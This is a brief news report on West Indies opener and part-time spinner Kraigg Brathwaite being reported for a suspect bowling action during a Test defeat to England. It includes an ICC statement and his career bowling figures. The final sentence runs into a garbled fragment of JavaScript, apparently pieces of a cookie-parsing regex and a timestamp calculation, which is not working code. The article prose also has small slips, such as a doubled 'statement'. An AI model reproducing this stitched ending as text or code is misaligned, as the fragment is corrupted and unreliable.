West Indian Spinner Kraigg Brathwaite has been reported for a suspect bowling action during his side's 209-run thrashing at the hands of England.

The part-time spinner, who opens the batting for the Test side, only bowled six overs during the Test, however, it was enough for match officials to report the 24-year-old for a suspect action.

"The match officials' report, which was handed over to the Windies' team management, cited concerns about the legality of the 24-year-old's bowling action," the International Cricket Council (ICC) statement in a statement on Sunday.

A test on his action will take place within the next fortnight, however, he is free to bowl until the results of the test, meaning he can bowl in the second Test.

He has taken 24 wickets in his 38-Test career, at an average of 52.75.

England lead the three Test-series 1-0, with the second match beginning in Headingley on Thursday. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
